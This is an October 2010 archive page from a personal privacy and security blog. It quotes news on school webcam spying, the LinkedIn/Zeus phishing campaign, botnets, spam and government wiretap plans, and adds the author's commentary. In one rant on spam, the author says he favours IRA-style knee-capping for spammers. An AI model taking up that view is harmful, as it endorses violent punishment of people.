
The migration of human social interaction from ephemeral forms that took place face to face into data that never goes away and does not allow us to forget or leave behind our past actions was undoubtedly going to change society, he said.

"Forgetting is a very powerful social tool that helps us get by and get along," he said.

As lives are lived more and more online or via the phone it has led, said Mr Schneier, to a situation in which everyone has to be the guardian of their own privacy policy.

"That's new and fundamentally unnatural," he said.

Deciding what data we are prepared to surrender would be fine if people were given a proper choice, he said.

Unfortunately, he said, users of social networking sites or any online service were being presented with choices defined by priorities they did not choose.

The choices are filtered through the law, which is being outstripped by technological change, leaving people with only what net firms give them or can get away with.

"The social rules are being set by businesses with a profit motive," he said." [bold mine - James]


BBC - Bruce Schneier warns 'profits killing personal privacy'

----

Technology has changed the world when it comes to privacy. We as a global society need to look at how we treat privacy issues.

Just as the new terrible technologies of war changed the way people looked at war and how it was conducted during and after World War 1 (think chemical weapons), just as nuclear weapons changed the way major powers approach each other, so too computing power should force us to re-think way the world can treat us as individuals.

Computing technology and "expert systems" combined with ubiquitous surveillance is a new phenomenon to the human experience. We have to address it before those who control our societies go too far in controlling our lives.

Freedom is not a birthright. It is earned and fought for every day.

Think about your freedom. It is being taken away even as your read this.

Even as you read this, a computer somewhere is logging both your activity and mine. How that data is used or not used is an important question that urgently needs addressing.

----

Photo Credit: Treehugger - Saving Energy in Data Centers with Smart Sensors and Algorithms

Tuesday, October 12, 2010

School District Remotely Activated Webcams On Students Computers While They Were At Home; Some Partially Dressed; Lawsuit Settled For $610K

Graphic ripped off from wired magazine article below
"At issue are school-issued Mac laptops provided to 2,300 students at Harriton High School. Unbeknownst to those students and their parents, the laptops were equipped with tracking software that could remotely activate the computer's webcam to take photos of the user, as well as capture screen shots. It was intended as a means to locate lost or stolen laptops, but was apparently activated in more questionable circumstances as well."


PC Magazine - Pa. School District Settles Webcam Spying Case for $610K

"An invasion-of-privacy lawsuit followed, alleging the district had snapped thousands of pictures of its students using webcams affixed to the 2,300 Apple laptops the district issued. Some of the images included pictures of youths at home, in bed or even “partially dressed,” (.pdf) according to a filing in the case. Students’ online chats were also captured, as well as a record of the websites they visited."


Wired - Second Student Sues School District Over Webcam Spying

----

Anyone remember a little while ago when I asked the question:

Do Students/Children Deserve Any Privacy?

"When I read the information above, it makes me think of the kind of activity and thought control used in Orwell's 1984...."

"I suppose, if educators know everything a child does they can correct them... What a fine idea to promote healthy lifestyles and healthy choices... but, do we really want children who are being monitored and re-educated? There is a fine line between guidance and control - and too often I believe schools and teachers (and parents) cross that boundary."

I also asked the questions:

"Do you think that teachers and guidance counselors who get lipped off by a teen or child are going to be fully beneficent when dealing with that child's lifestyle database?"

"Do teachers ever inappropriately retaliate against their students?"


I think this case shows just how stupidly and inappropriately teachers and school administrators can act. In many ways the totally paternalistic attitude of schools and teachers toward students is highly problematic. This case shows how easy it is for "in loco parentis" to tip straight into the "loco" part.

It illustrates how people will always push the envelope - not just teachers and school administrators.

If people have the power to do something, they will likely do it. Read these articles and think about work laptops taken home.

Think about the backdoor into encryption and computers that most law enforcement and "National Security" agencies seem to be asking for these days. Your privacy can be easily violated for trivial reasons. It's not just about people getting watched by spy agencies...

Think about how people at insurance companies or the government look up people's information for personal reasons: CBC - FedEx employee decries government privacy breach


Think about the people at the U.S. passport agency looking up Obama's personal information: MSNBC - Passport files of candidates breached; Records of Clinton, McCain, Obama inappropriately accessed, officials say

----

And one last link to the laptop/webcam story:

The Telegraph - Students win payout after schools spy on them with laptops
A school authority has agreed to pay out $610,000 (£385,000) after admitting it spied on pupils in their homes through the cameras on their laptop computers.


----

Picture credit: Wired Magazine - Second Student Sues School District Over Webcam Spying

Friday, October 8, 2010

LinkedIn Email Attack "Largest Ever" => 25% Of Worldwide Spam That Week

"An email attack targeting users of the LinkedIn social networking service this week was so active that it accounted for nearly one-quarter of all spam email sent at one point, a malware expert says.

Disguised as an invitation from someone to connect with him or her on LinkedIn, the spam is actually a phishing, or identity theft attack, “widely used by criminals to pilfer commercial bank accounts,” said Henry Stern, a senior security researcher with Cisco Systems, in a blog posting.

“This is the largest such attack known to date,” he noted.

Clicking a link in the email takes the victim to a web page that says “Please waiting … 4 seconds” during which time Zeus, a malevolent Trojan horse software program, downloads and embeds itself in the victim’s web browser.

Once embedded, it logs a victim’s keystrokes and “captures personal information, such as online banking credentials,” Stern said."


theStar.com - Email attack targeting LinkedIn users termed ‘largest ever’

----

Last week a major attack occurred. You should know about it and learn from it. Learn how to identify spam and phishing attacks.

I would recommend that even if you can't read all the articles i am linking to in one sitting, that over the next week you return and read them all. In the digital world we live in, this is as important as any security primer you will read.

Even if you manage to get things sorted out after your bank account is cleaned out by operators like these people, you will still be out a lot of money. Can you live without the contents of your bank account?

Be safe.

On a personal note, as I was poking about for a graphic for this story on google images, I clicked on an image that looked likely and my anti-virus blocked two intrusion attempts on my computer from clicking on the image and beginning to load the page the image was on. It is a hostile internet out there. Be as careful as you would be taking a nighttime walk in the Congo...

----

This article has a good description of how to analyse an email of this variety:

Dave Hatter blog - WARNING! Phishing attack disguised as LinkedIn invitations & LinkedIn messages is underway!

----

PC World - Warning: Fake LinkedIn Spam Can Steal Your Bank Passwords;
Bogus LinkedIn emails can infect your computer with ZeuS, a password-stealing Trojan. I know, because it just happened to me.


----

"Computer users can protect against attacks by not clicking on links in e-mails and instead typing "www.linkedin.com," for instance, into a browser. Firefox users can install the NoScript plug-in to block JavaScript.

In addition to keeping antivirus and other security software up to date, computer users should also "make sure all Web browser-related software, especially Adobe Reader, Flash, and Java, have the latest security updates," Stern said."



CNET - Fake LinkedIn e-mails lead to Zeus Trojan

----

InformationWeek - LinkedIn Attack Spreads Zeus Financial Malware

----

The National Business Review - Faked LinkedIn email targets bank account details

----

"This particular Zeus variant monitors browser entries for online bank account credentials.

"This strongly suggests that the criminals and individuals behind this most recent attack are most interested in employees with access to financial systems and online commercial bank accounts than anything else," said a Cisco statement."


Technology Digital - Virus-affected LinkedIn; Cisco Systems announced that LinkedIn is currently being used as the ultimate bait for email spam campaign

----

Forbes - Cisco Security Analyst Gives Countermeasures Update on LinkedIn Malware Attack

Thursday, October 7, 2010

"Botnet takedown may yield valuable data"

Photo stolen from wired - see story linked below
"A Botnet is a collection of software agents, or robots, that run autonomously and automatically. The term is most commonly associated with malicious software..." "...this word is generally used to refer to a collection of compromised computers (called zombie computers) running software, usually installed via drive-by downloads exploiting web browser vulnerabilities, worms, Trojan horses, or backdoors, under a common command-and-control infrastructure.

A botnet's originator (aka "bot herder" or "bot master") can control the group remotely...
" - Wikipedia
----
"Researchers are hoping to get a better insight on botnets after taking down part of Pushdo, one of the top five networks of hacked computers responsible for most of the world's spam.

Thorsten Holz, an assistant professor of computer science at Ruhr-University in Bochum, Germany, said his group is working on an academic paper focused on methods to figure out what type of malicious spamming software is on a computer that sent a particular spam e-mail.

They looked at several of the major spamming botnets, including Mega-D, Lethic, Rustock as well as Pushdo and Cutwail, two kinds of malware that appear to sometimes work together as part of the same botnet"
ITWorld - Botnet takedown may yield valuable data

----

The above posted for your information. No real commentary.

I think that understanding that the threats are real is critical to understanding why we need to be conscious of access to information, privacy, security, and data management in general.

Understanding that there are people out there using networks to nefarious ends is important to understand why privacy commissioners are beaking off about privacy and security - like in the government Blackberry story I posted previously.

----

Wired - Botnet Hacker Gets Four Years
March 5, 2009

"A Los Angeles man was sentenced late Wednesday in federal court to four years in prison after pleading guilty last year to infecting as many as 250,000 computers and stealing thousands of peoples’ identities and hijacking their bank accounts.

The Los Angeles authorities said John Schiefer, 27, was the nation’s first defendant to plead guilty to wiretapping charges (.pdf) in connection to using botnets.

Schiefer, who went by the online handle "acidstorm," faced as many as 60 years in prison and acknowledged using a botnet to remotely control computers across the United States. Once in control of the computers, the authorities said, (.pdf) his spybot malware allowed him to intercept computer communications. He mined usernames and passwords on accounts such as PayPal and made purchases totaling thousands of dollars without consent."


----

Picture credit: Wired - Botnet Hacker Gets Four Years

Wednesday, October 6, 2010

"Where are my keys .. I lost my phone"; Federal Privacy Commissioner Issues Strong Warnings

“Where are my keys .. I lost my phone” - Lady Gaga...

"Canada’s privacy watchdog says some federal departments have no security procedures in place for recovering, wiping or encrypting lost and stolen BlackBerry smart phones.

The oversight is just one of a laundry list of potential privacy breaches highlighted by Privacy Commissioner Jennifer Stoddart in a new government report released Tuesday.

The report examined how five federal departments — Canada Mortgage and Housing Corporation, Correctional Service of Canada, Health Canada, Human Resources and Skills Development Canada, and Indian and Northern Affairs Canada — dispose of old PCs and manage their wireless security infrastructure. The five departments represent trends occurring throughout other government departments and were chosen because of the significant amount of personal data they collect, Stoddart said.

The report found that none of the five departments had fully assessed the threats and risks associated with smart phones and wireless communications.

Other notable wireless security issues found during the audit include the lack of any encryption policies for data stored on BlackBerry devices, the liberal use of BlackBerry’s PIN-to-PIN messaging system among bureaucrats, and weak password policies for mobile devices."


IT World Canada - Privacy czar blasts feds on BlackBerry use

----

"In recent years, the use of smart phones such as the BlackBerry, as well as other mobile devices, has become pervasive among federal public servants, just as it has in the private sector. But in an interview, Stoddart said government departments aren't thinking "seriously enough" about how the proliferation of wireless technologies could be putting the personal information of Canadians at risk.

"They were handing out BlackBerrys, in some cases, with no instruction to staff about passwords, or encryption, so it is an area for concern," she said. "It's very concerning that significant parts of the federal government have still not caught up to the implications of the new technology."


Canada.com - Privacy watchdog 'disturbed' by feds' BlackBerry use, disposal of documents

----

Hopefully you'll forgive the gratutious use of a Lady Gaga picture on this story - she is holding a Blackberry, and her quoted lyrics indicate a missing cell phone, so that should tie it into the main story a little...

People don't want to learn how to use their technology.

"Waaah! Boo-hoo! I have to learn something new," say the users.

Get over it.

You are carrying around a huge amount of personal information, and in the case of government officials they are likely carrying around other people's information as well.

I wonder how these folks would feel if their lawyer wandered around town with their personal files and didn't take care to secure them? I wonder how they would feel if their doctor wandered around with their health files?

I think the point is made.

It takes about 30 minutes to learn how to set up the privacy settings on a smart phone. It might take another 15 minutes to play with them to make sure you know how to use them properly.

The security is built into the devices. It just has to be turned on.

Take the time.

Spammers Change Delivery Techniques: Infected HTML Attachments On The Rise



(for less technical readers: an HTML attachment is when the email sent to you has an embedded web page in it - James)

----

TechEye.Net - HTML spam breaks banks, floods PCs
And there's more to come

"Spam campaigns using emails with infected HTML attachments accounted for around two and eight percent of all spam, according to Sophos.

The security company said this security threat was particularly rampant over the past four months but June and September were hit the worst with this spam accounting for eight percent of all email threats.

However, it seems the spammers may have been on their summer holidays in July and August with these figures falling.

Graham Cluley, senior technology consultant at Sophos said that part of this was down to a large number of malicious spam with embedded HTML attachments (detected as Troj/JSRedir-BO), and was associated with Facebook password resetting tasks, the FIFA World Cup and Skype in June."

----
"According to Symantec's September 2010 “State of Spam and Phishing” report, spam accounts for 92.51% of all email sent during August 2010, up from 91.89% during July 2010.

Spam originating from the Europe, Middle-East and Africa regions has decreased from 48.97% in June to 43.17% in August 2010.

The biggest concern of the September report, according to Symantec, is spam-distributed malware. Malware spam took a one month hiatus but has returned at triple the volume from the previous month's report.

Malware distributed as .zip attachments to spam emails saw a four-fold increase this month, but there was also a wave of .html attachments containing malicious JavaScript."
MyBroadBand News - Spam report: Top 10 subject lines and massive malware push

----
"Spam campaigns, which generated emails with malicious HTML attachments, have been particularly aggressive during the past four months and they accounted for between two and eight percent of all spam."

"The majority of rogue HTML files served in this manner consist of phishing pages or contain JavaScript code that redirects users to malware pushing websites.

As far as phishing is concerned, attacks employing this technique have targeted the customers of organizations like PayPal or Banchi de Credito Cooperativo.

"Instead of setting up a bogus financial website, scammers insert the phishing contents directly into the HTML attachment," the Sophos researchers explain."
Softpedia News - HTML Attachment Spam Exploded in Recent Months

----

I offer this information to readers of this blog, so that it gives you an idea of what is happening with email based attacks.

The TechEye article has a good list of the kind of results that can occur from even just opening email.

I personally run my email in text only mode. I can't send emails that are all fancy with pretty background graphics, and email sent with such elements are lost on me in these settings. I block all scripts running on email, and I block graphics and other page elements which pull from outside sites.

Always make sure you turn on your anti-phishing capabilities on your browsers and email clients, and don't allow your email to pull page elements in from outside addresses.

One of the critical reasons to not pull in outside graphics is because many of them do a targeted pull from a server somewhere and by pulling that graphic, you are verifying that your email address is live, someone reads it, and that you open email with embedded web pages.

----

Personal Rant: Pretty emails with fancy fonts and pictures and backgrounds may look nice and make you warm and happy inside, but are they really worth the kind of automated terror that can be brought on when you open the email? If your computer gets infected because you like pretty emails and someone drains your bank account, will it be worth it then?

Personal Rant 2 Why would anyone ever open an attachment from someone they don't know? Really... why?

Personal Rant 3: If an email arrives claiming to be from your bank and asks you to click on the link in the email, don't. Banks do not send out emails asking for verification of personal information.

The exception to the above rule is if you were just at your bank website and asked to have it send you an email regarding your password, and one arrives in moments after you requested it...

Tuesday, October 5, 2010

Montreal Man Ordered To Pay Facebook $1 BILLION For Spamming

"MONTREAL - Spammers of the world, beware.

A Montreal man has been ordered to pay Facebook $1 billion after allegedly spamming its members with a variety of messages including penis-enlargement ads.

Quebec Superior Court upheld a ruling by a U.S. court that Adam Guerbuez owed the money for allegedly flooding people's Facebook pages with more than 4 million messages.

The case is touted as a potential precedent-setter — with some calling it the largest such penalty, by far, in Canadian legal history.

But Facebook shouldn't hold its breath waiting for the money. Guerbuez says he's legally broke and therefore not compelled to give anything to the social-networking giant."
Winnipeg Free Press - Spammers of the world, beware; court orders Quebecer to pay Facebook $1 billion

----
"Facebook is trying to stop spammers with something new, disabling clickable links posted in news feed comments.

This a dramatic step they are taking in their battle against spammers. What they have done is make all external website links non clickable in an effort to cut done on spammers and hackers. So now when someone tries to comment on one of your posts and put a link to lets say Google.com that link will now come up in black."
Examiner.com - Facebook Desperately Trying To Stop Spammers

----
""If you think parasites and other simple life-forms can't thrive in the most basic of media, you haven't looked in my compost pail lately. So leave it to spammers to find the fresh fuel from social networks to ply their junky trade.

One spammer found a loophole in Facebook's photo uploading system and used it to post thousands of Wall messages, most of which promised free iPhones. Thousands of profiles got hit before the company removed the spammy content; Facebook claims no accounts were compromised as a result of the glitch.

There's also a scam going with a fake Facebook Dislike button, which drives unsuspecting users to revenue-generating online surveys, again promising free iPhones or iPads."

"On a statistical basis, this shift in spammer strategy from email to social networking sites tracks perfectly with users' online behavior: Facebook traffic is closing on, and poised to surpass, email volumes and shows no signs of slowing down."
Internet Evolution - Forget Email... Social's the New Spam Vector

----

Wow, do I ever hate spammers.

As a guy whose email account has been around since about 1992, I get around 1000 spam a day to my email account. My spam filters take care of a good deal of it, but I still end up having to delete a lot of spam (at least one hundred a day) from my mailbox.

I am having to invest in more filtering software.

That costs me money. Personally. Right out of my pocket.

Spammers, by spamming, steal from me and make my life miserable. They constantly probe my systems trying to get past all my security so that they can misuse my servers to send their spam. That takes work and monitoring. It's like having someone who is constantly trying to break into your house. It is stressful and upsetting. I'm a computer guy and I take the condition of my servers in the same kind of psychic zone as my pets' health.

My friends have gone as far as to change their email addresses so as to lose the spam they get. I refuse to take that step to date. But there are times I consider it. But I'm stubborn enough to try to stick it out. I don't want the spammers to win.

The $1 Billion award above is an awesome first step. I personally favour the method used by the IRA to deal with people who stepped out of line - it's a practice known as knee-capping. That's where the shoot you in the knee-cap to cause permanent injury in order to punish someone. I suspect that Amnesty International might review my membership (if it is still active... have to check on that...) if they ever read this (even though I suspect that in private moments they might have the same base desire).

Spamming

Yeah

Sorry about the rant

Down with spammers!

Online Behavioural Tracking Self-Regulatory Opt Out System Proposed By Advertisers

"As the debate around online privacy and advertiser access to users’ data continues, a group of the advertising industry’s largest trade organizations was to announce on Monday the details of a self-regulatory program that would allow users to opt out of being tracked by its member organizations.

The program provides details on how companies can adopt some of the principles for conducting online behavioral advertising outlined in a report released last July.

The program includes the use of an icon called the “Advertising Option Icon” that marketers can place near their ads or on the Web pages that collect data that is used for behavioral targeting. Users who click on the icon, a lower case letter “I” inside a triangle that is pointing right, will see an explanation of why they are seeing a particular ad and will be able to opt out of being tracked."
New York Times - Ad Group Unveils Plan to Improve Web Privacy

----

The Register - Opting out of behavioural ads to get easier for US users

----
"Five advertising trade groups, including the Direct Marketing Association (DMA) and the Interactive Advertising Bureau (IAB), have launched a new program that will label online advertisements that their members serve based on the Web-surfing habits of consumers.

The five groups on Monday launched AboutAds.info, which gives online advertisers and networks information about the new advertising option icon. The groups are pushing members to use the icon, which will be tied to an opt-out mechanism for targeted advertising, alongside online advertisements.

The action by the five groups comes as some members of the U.S. Congress have explored privacy legislation that would set rules for the collection of personal data by online advertisers. The U.S. Federal Trade Commission also issued revised guidelines for behavioral advertising in February 2009, and it is again looking at new standards."
ComputerWorld - Online groups introduce labeling for targeted ads

----

Do I trust this self-regulatory scheme?

NO

In my opinion, having the opt-out plan won't actually increase privacy protection. It will give the illusion of control to people who surf the net and will lead to most just skipping right past the icon. Or, we're going to get awesome options like the ones provided by FaceBook where you can click the little X to make an ad go away, and then have to answer a quiz about why you dislike the ad - which allows them to do even better behavioural marketing by assessing the negative responses.

I would suspect that the "feeling" of control, will also cause less privacy conscious behaviours on the part of users. I don't have a reference handy, but when researching fast food purchasing behaviours, studies have indicated that having the option of a salad on a fast food menu causes consumers to relax about their meal choices and their calorie intake - and end up eating more because people tell themselves "next time i will make a healthier choice" (at least according to post-purchase interviews [as i recall the study report]).

Yeah- self-regulation...

It seems to have worked so well before. Worked so well in favour of regular people.

Think of how well self-regulation worked for big banks in the U.S. recently - heck self-regulation only caused the near collapse of the international financial system, the collapse of the global economy, threw millions upon millions of people out of work, caused a world-wide recession that is still ongoing with substantive economic effects that are predicted to last for 10 years - so, hey, that's only 8 more years. Sure, self-regulation - always an idea with merit.

Monday, October 4, 2010

U.S. National Security Apparatus Says It Needs Even More Routine Access to Your Communications


aLL ur komUnIKayshunZ R minez...

[The U.S. national security apparatus] "...is preparing legislation that would force all Internet communications providers - from social networking sites to smart phones - to give the government more access to intercept and monitor online communications. Law enforcement officials claim that terrorists are "going dark" and that they need more tools to monitor them.

Silicon Valley was taken by surprise by the announcement, suggesting that officials didn't even think to include technology companies in the discussion. Maybe if they had, they wouldn't have come up with such a drastic, odious and cumbersome proposal.

Officials' reasoning is confusing, considering the enormous scope of interception capabilities and wiretapping authority they have already. Phone and broadband networks are already required to have interception capabilities. Investigators can often intercept communications at a switch offered by network companies."

"...But now they're claiming that it's not enough. They want all communication servers to have a way for them to intercept messages, and the capability to provide the government with the unencrypted text of private conversations.

Other countries have tried to implement or are implementing a similar set of draconian regulations - India, the United Arab Emirates, Saudi Arabia.

If inclusion in this group makes you uncomfortable, it should. These aren't countries with an established tradition of personal privacy laws. To follow in their footsteps is at odds with American legal tradition and American values. As citizens, we're outraged that officials think so little of the concept of privacy.

Creating a separate entry for governmental access raises serious security risks for average Americans as well. If companies purposely create an opening in their software that's easy for the government to enter, it will be even easier for hackers and criminal networks to worm in. That's what happened to the Greek government in 2005. Hackers took advantage of a legally mandated wiretap function to spy on Greek politicians."

San Fransisco Chronicle - Internet monitoring plan threatens privacy

----

Obama can has interwebz wiretap?

----

Mercury News - Privacy advocates criticize government's online eavesdropping proposal
"This view that law enforcement is being left in the dark by technology is a myth," Rotenberg said. Government officials have a "lot of ways" to investigate crimes and terrorist threats.

"Now they want the additional benefit of the network being wiretap-friendly," he added. "We're saying that simply goes too far."

Encryption and peer-to-peer networking have become widely used on the Internet for everyday communications, advocates say. Online purchases, financial transactions and even e-mail messages are routinely encrypted these days. And some new laws setting privacy standards have encouraged the wide use of encryption for storing and transmitting health information and other electronic or online records."

----
New York Times - Internet Wiretapping Proposal Met With Silence

----

I can't say that I am happy with any proposal to grant unlimited, unscrutinised access to private communications. The clubby atmosphere and underlying political agendas of those involved in the so-called national security business leaves me highly uncomfortable with proposals for broad-brush monitoring.

It is far too slippery a slope, and these kinds of powers and abilities are often granted in a cone of deafening silence.

We as a free (ostensibly) people need to be very wary of such requests. I find it interesting how privacy rules are being cranked up for most other sectors, but so-called national security gets their way without a wimper and without oversight. The Right wing has managed to make all politicians afraid of speaking up for real freeedom - for fear that those politicians will be called "weak on defense" or "weak on security" or "soft on terrorism".

And the North American and European public keeps quaffing its Soma and votes from a perspective of apathy, lack of knowledge, and fear of brown people and others who are "different". Because it's brown people who get extra searches and questioning, not "real Americans" or "real Canadians" as some politicians like to say.